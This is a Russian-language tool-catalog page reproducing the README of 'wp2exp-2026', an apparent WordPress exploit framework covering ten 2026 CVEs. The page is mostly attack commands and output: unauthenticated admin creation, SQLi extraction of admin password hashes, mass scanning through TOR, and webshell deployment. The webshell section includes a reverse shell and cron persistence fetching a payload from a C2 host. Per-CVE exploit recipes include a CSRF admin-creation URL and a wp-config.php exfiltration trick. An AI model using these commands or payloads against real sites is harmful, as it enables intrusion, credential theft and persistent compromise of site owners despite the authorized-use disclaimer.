Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wp2exp-2026 — WordPress All-in-One Exploit Framework — детектор, сканер, энумератор, эксплойт, эскалация привилегий. 10 CVE из волны 2026-08, включая CVE-2026-63030 (wp2shell). | Kitploit
Инструменты/GitHubGitHub/rechandra/wp2exp-2026
Повышение привилегийРазведкаСканеры уязвимостейФреймворки для эксплойтовЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubrechandra/wp2exp-2026

wp2exp-2026

WordPress All-in-One Exploit Framework — детектор, сканер, энумератор, эксплойт, эскалация привилегий. 10 CVE из волны 2026-08, включая CVE-2026-63030 (wp2shell).

515 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

wp2exp_2026 🔥

Универсальный эксплоит-фреймворк для WordPress — Детектор · Сканер · Энумератор · Эксплоит · Эскалация

wp2exp_2026 — это переименованный, проверенный в бою преемник фреймворка wp2shell. Он объединяет исходную цепочку проверки/эксплуатации wp2shell, три публичных PoC-кита для CVE-2026-63030 (Ch4120N, shinthink, SentinelX) и августовскую волну CVE WordPress 2026 года, собранную из NVD / GitHub Advisories / CISA KEV через TOR-конвейер darkweb-intel, — в один скрипт, который ведёт цель от пассивного снятия отпечатков до проверенного веб-шелла.

root@kitploit:~
┌──────────┐    ┌──────────┐    ┌───────────┐    ┌───────────┐    ┌──────────┐
│ DETECTOR │ -> │ SCANNER  │ -> │ ENUMERATOR│ -> │ EXPLOIT   │ -> │ ESCALATE │
│ 10 CVEs  │    │ version/ │    │ users/    │    │ admin     │    │ webshell  │
│ probes   │    │ WAF/XMLRPC│    │ plugins   │    │ create/   │    │ rev shell │
└──────────┘    └──────────┘    └───────────┘    └───────────┘    └──────────┘

⚠️ ТОЛЬКО АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ. Режим scan не является разрушительным. Режимы эксплуатации явно требуют --mode. Вы несёте ответственность за наличие письменного разрешения на каждую цель.


📦 Установка

root@kitploit:~
# Clone
git clone https://github.com/rechandra/wp2exp-2026.git
cd wp2exp-2026

# Dependencies: Python 3.8+ standard library only.
# Optional: PySocks for SOCKS5/TOR proxying
pip install pysocks

Никаких API-ключей, баз данных и компиляции.


🚀 Быстрый старт

root@kitploit:~
# 1. Safe scan of one target (detector + scanner + enumerator)
python3 wp2exp_2026.py https://target.com

# 2. Same scan, but fire exploitation (admin creation + content dumps)
python3 wp2exp_2026.py https://target.com --mode exploit

# 3. Full chain to a verified webshell
python3 wp2exp_2026.py https://target.com --mode shell

# 4. Mass scan a file of targets
python3 wp2exp_2026.py -f targets.txt --threads 10

# 5. Anonymous scanning through TOR
python3 wp2exp_2026.py https://target.com --proxy socks5h://127.0.0.1:9050

🔧 Справочник по командной строке

root@kitploit:~
usage: wp2exp_2026.py [-h] [targets ...] [-f FILE] [--mode {scan,exploit,shell}]
                      [--shell {mini,full}] [--mapster-dump N] [--proxy PROXY]
                      [--timeout N] [--threads N] [--json] [-o OUTPUT]

🧭 Руководство по режимам

Режим 1: scan — Детектор + Сканер + Энумератор (безопасный)

Неразрушающий. Используйте его первым на любой цели.

Что он делает по порядку:

Пример:

root@kitploit:~
python3 wp2exp_2026.py https://example.com
# outputs: version, WAF, XMLRPC, users, plugin versions, per-CVE verdicts

Режим 2: exploit — Скан + Эксплуатация

Всё из scan, плюс:

Пример:

root@kitploit:~
# Scan + create admin + dump 200 post IDs through Mapster
python3 wp2exp_2026.py https://example.com --mode exploit --mapster-dump 200

Режим 0: --verify — Самопроверка окружения

Проверяет среду выполнения перед любым сканированием: Python ≥3.8, наличие PySocks (SOCKS5/TOR), доступность прокси (если задан --proxy), целостность матрицы CVE, корректность парсера версий.

root@kitploit:~
python3 wp2exp_2026.py --verify
python3 wp2exp_2026.py --verify --proxy socks5h://127.0.0.1:9050

Режим 3: shell — Полная цепочка до веб-шелла

Всё из exploit, плюс эскалация: если создание администратора удалось, скрипт:

  1. Входит в wp-login.php (хранилище cookie)
  2. Путь A (тема): извлекает _wpnonce редактора темы + активную тему → записывает веб-шелл через admin-ajax.php?action=edit-theme-plugin-file
  3. Путь B (плагин, запасной): если редактор темы недоступен → собирает zip-архив плагина с шеллом, загружает через update.php?action=upload-plugin, активирует его
  4. Проверяет, выполняя id через шелл — выводит живой результат команды

Типы веб-шеллов (--shell):

Пример:

root@kitploit:~
python3 wp2exp_2026.py https://example.com --mode shell --shell full --sqli-info
python3 wp2exp_2026.py --verify
# -> ADMIN CREATED: wp_xxxx / Wp!yyyy
# -> WEBSHELL: https://example.com/wp-content/themes/twentytwentyfive/.wp-abc123.php?k=KEY&c=id
# -> verify: uid=33(www-data) ...

Ручное использование шелла после успешного запуска:

root@kitploit:~
# Command execution (mini)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&c=id'

# Full shell — file upload
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=upload&f=/tmp/pwned.txt&d=<base64>'

# Full shell — reverse shell (listener: nc -lvnp PORT)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=rev&h=YOUR_IP&p=4444'

# Full shell — cron persistence (curl piped to sh from your C2)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=persist&u=https://c2.example/payload.sh'

🧨 Покрытие CVE (августовская волна 2026)

Цепочки эксплуатации по каждому CVE (документированы в коде)

  • FormGent (3141): DELETE /wp-json/formgent/v1/responses/attachments?file_token=<base64("formgent/YYYY/MM/FILE")> — маршрут зарегистрирован без middleware аутентификации; токен — это сырой base64 относительного пути (можно подделать). Исправленные версии используют подписанный UploadFileToken.
  • AI Engine (15988): reauth_for_authorize сопоставлял /mcp/v1/oauth/authorize с помощью проверки подстроки по REQUEST_URI, включая строку запроса. Добавьте &x=/mcp/v1/oauth/authorize к любому REST-запросу, чтобы восстановить полную идентичность пользователя из cookie. Классический CSRF: администратор, перешедший по сфабрикованному URL, создаёт учётную запись атакующего.
    root@kitploit:~
    https://T/wp-json/wp/v2/users?_method=POST&x=/mcp/v1/oauth/authorize&username=csrf_admin&password=...&roles=administrator
    
  • Bit Integrations (15006): плагин устанавливает wpcf7_verify_nonce => __return_true → отправкам CF7 nonce не нужен; отправьте файловое поле, содержащее ../../../../wp-config.php, и действие интеграции (webhook/email) вытащит файл.

🕶️ Интеграция с TOR / Darkweb

Скрипт создан на основе разведданных, собранных TOR-конвейером darkweb-intel (сбор свежих CVE из NVD, GitHub Advisories, CISA KEV), и поддерживает анонимное сканирование:

root@kitploit:~
# Scan through TOR (requires tor daemon on 9050)
python3 wp2exp_2026.py https://target.onion --proxy socks5h://127.0.0.1:9050
python3 wp2exp_2026.py -f targets.txt --proxy socks5h://127.0.0.1:9050 --threads 5

# Verify your exit node
# (script's Http layer reports IsTor:true when routing through TOR)

Проверенное поведение: работа с прокси подтверждена через check.torproject.org/api/ip → {"IsTor":true} через выходной узел 192.42.116.45.


📊 Вывод и отчёты

root@kitploit:~
# Console: colored per-stage verdicts + final summary table
# JSON report to file (always includes raw responses for evidence)
python3 wp2exp_2026.py https://example.com --mode shell -o report.json

# Full JSON to stdout for piping into jq / your own tooling
python3 wp2exp_2026.py https://example.com --json | jq '.[0].cve_checks'

Структура отчёта:

root@kitploit:~
{
  "target": "https://example.com",
  "version": "7.0.1",
  "waf": "Cloudflare",
  "xmlrpc": true,
  "users": [{"id": 1, "name": "admin", "slug": "admin"}],
  "plugins": [{"slug": "formgent", "version": "1.9.2", "vulnerable": true}],
  "core_wp2shell": {"verdict": "VULNERABLE", "endpoint": ".../wp-json/batch/v1"},
  "cve_checks": {"CVE-2026-3141": {"vulnerable": true, "detail": "..."}},
  "exploitation": {
    "wp2shell_admin": {"success": true, "username": "...", "password": "..."},
    "shell": {"success": true, "shell_url": "...", "key": "..."},
    "mapster_posts": [...]
  }
}

🧪 Валидация

Проверено 2026-08-04 в эмулированной уязвимой лаборатории WordPress — QA-батарея: 32/32 проверки ПРОЙДЕНЫ (все режимы, чистота JSON, несколько целей, нормализация голого хоста, утечка черновиков/приватных записей Mapster, извлечение версии БД и хеша администратора через SQLi, полная цепочка шелла):

root@kitploit:~
wp2shell (CVE-2026-63030): VULNERABLE
ADMIN CREATED: wp_7ytp1 / Wp!s6d2yz28qiey
WEBSHELL: .../twentytwentyfive/.wp-cg93vk.php?k=...&c=id
verify: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Mapster (CVE-2026-14839): dumped draft + private posts
FormGent (CVE-2026-3141): unauth DELETE route confirmed
TOR: IsTor:true exit 192.42.116.45

🧩 План развития / Участие

  • Автоизвлечение через SQLi (union-движок), встроенное в режим exploit (--sqli-info)
  • Запасной вариант создания админа через SQLi oEmbed (цепочка shinthink)
  • Запасной вариант загрузки веб-шелла в виде zip-плагина
  • Самопроверка окружения --verify
  • Модуль перебора паролей по имени пользователя WordPress (XMLRPC multicall)
  • Автообновление матрицы CVE из вывода darkweb_intel.py
  • Генератор HTML-отчётов

PR приветствуются. По умолчанию сохраняйте нагрузку неразрушающей.


⚖️ Лицензия и этика

MIT. Только авторизованные работы. Никогда не запускайте --mode exploit / --mode shell против ресурсов, которыми вы не владеете или на тестирование которых у вас нет письменного разрешения. Авторы не несут ответственности за неправомерное использование.

Скачать инструмент
АргументПо умолчаниюОписание
targets—Один или несколько базовых URL (https://site.com или просто site.com)
-f, --file—Файл с одной целью в строке (комментарии # допускаются)
--modescanscan = только обнаружение · exploit = скан + эксплуатация · shell = скан + эксплоит + веб-шелл
--shellminiТип веб-шелла: mini (однострочное выполнение команд) или full (управление файлами / загрузка / реверс-шелл / постоянство через cron)
--mapster-dump0Дамп N ID записей через CVE-2026-14839 (0 = отключено)
--sqli-infooffИзвлечение db_version / siteurl / хеша пароля администратора / префикса таблиц через SQLi (CVE-2026-60137)
--verifyoffСамопроверка окружения (python, PySocks, доступность прокси, матрица CVE, парсер версий) и выход
--proxy—HTTP-прокси или SOCKS5: socks5h://127.0.0.1:9050 (TOR)
--timeout15Таймаут на запрос (секунды)
--threads5Параллельные цели (используется только с несколькими целями / -f)
--json—Вывод машиночитаемого JSON-отчёта в stdout
-o, --output—Запись полного JSON-отчёта в файл
#ЭтапПроверки
1Снятие отпечаткаВерсия WordPress через генератор /feed/, /readme.html, meta-генератор, генератор REST API — отмечает, если версия попадает в уязвимый диапазон wp2shell (6.9.0–6.9.4, 7.0.0–7.0.1)
2Обнаружение WAFCloudflare / Sucuri / Akamai / AWS WAF / Imperva / Wordfence / F5 по заголовкам + маркерам тела ответа
3XMLRPCпроба system.listMethods → отмечает поверхность для мультиколл-брутфорса и pingback SSRF
4Перечисление пользователейREST /wp-json/wp/v2/users + запасной ?rest_route= + архив авторов (?author=N)
5Перечисление плагиновStable tag из readme.txt для всех 8 отслеживаемых плагинов — отмечает уязвимые версии по матрице CVE
6проба wp2shellБезопасная проба batch-desync (CVE-2026-63030) — отправляет повреждённый праймер + безобидный DELETE на несуществующую категорию; ищет маркеры перехвата обработчика (parse_path_failed, block_cannot_read, rest_batch_not_allowed)
7Проверки CVEЖивые поведенческие пробы + проверки версий для всех 10 CVE (см. таблицу ниже)
ЭксплоитУсловиеЧто происходит
Создание администратора без авторизацииwp2shell VULNERABLEПопытка 1: payload с подменой batch-маршрута отправляет POST /wp/v2/users с roles:["administrator"]. Попытка 2 (запасная): цепочка SQLi отравления oEmbed-кэша (shinthink) — union-инъекция customize_changeset для перехвата oEmbed-кэша + создания админа. При успехе выводит username / password
Извлечение информации через SQLi--sqli-infoИзвлечение на основе ошибок/union (CVE-2026-60137): db_version, siteurl, хеш user_pass первого администратора, префикс таблиц
Дамп контента Mapster--mapster-dump NПеребирает ID записей 1..N через /wp-json/mapster-wp-maps/feature?id=N, собирая заголовки черновиков / ожидающих / приватных / удалённых записей + полный контент (CVE-2026-14839)
ТипВозможности
mini?k=KEY&c=COMMAND → вывод команды в виде обычного текста
fulla=cmd выполнение · a=upload запись файла (b64) · a=download чтение файла · a=rev реверс-шелл (h=HOST&p=PORT) · a=persist постоянство через crontab (u=URL) · по умолчанию phpinfo()
CVEЦельCVSSКлассОбнаружениеЭксплуатация
CVE-2026-63030WP Core 6.9.0–6.9.4, 7.0.0–7.0.19.8Путаница batch-маршрутов REST → RCE✅ проба маркеров desync✅ создание админа + шелл
CVE-2026-60137WP Core (тот же диапазон)5.9author__not_in SQLi✅ версия + маркер✅ через цепочку 63030
CVE-2026-3141FormGent ≤ 1.9.29.1Неавторизованное удаление произвольного файла✅ живая DELETE-проба✅ подделываемый b64 file_token
CVE-2026-13596Participants DB < 2.7.8.49.1Неавторизованный SQLi (поиск по списку)✅ проба утечки ошибок⚠️ вручную (blind)
CVE-2026-15414Subscriptions for WooCommerce ≤ 2.0.08.8Повышение привилегий _wps_plan_user_role✅ версия✅ документированная цепочка
CVE-2026-15988AI Engine ≤ 3.6.58.8CSRF → создание администратора✅ проба namespace✅ генератор PoC-URL
CVE-2026-15450Nex Forms Lite ≤ 9.2.38.1Авторизованное удаление произвольного файла✅ версия✅ документированная цепочка
CVE-2026-15006Bit Integrations ≤ 2.9.07.5Неавторизованный обход каталога (обход nonce CF7)✅ версия✅ документированная цепочка
CVE-2026-14839Mapster WP Maps < 1.24.07.5Неавторизованный дамп приватных/черновых записей✅ живая проба✅ --mapster-dump
CVE-2026-15052MailChimp Subscribe ≤ 4.3.37.2Неавторизованный сохранённый XSS✅ версия✅ документированная цепочка
  • Nex Forms (15450): insert_record() сохраняет location файла, на которую может влиять атакующий, затем delete_file() вызывает unlink($file) без проверки realpath()/списка разрешённых.
  • Subscriptions for WooCommerce (15414): save_meta_boxes() сохраняет _wps_plan_user_role из $_POST; применяются только sanitize_key() + is_role() — обе принимают administrator.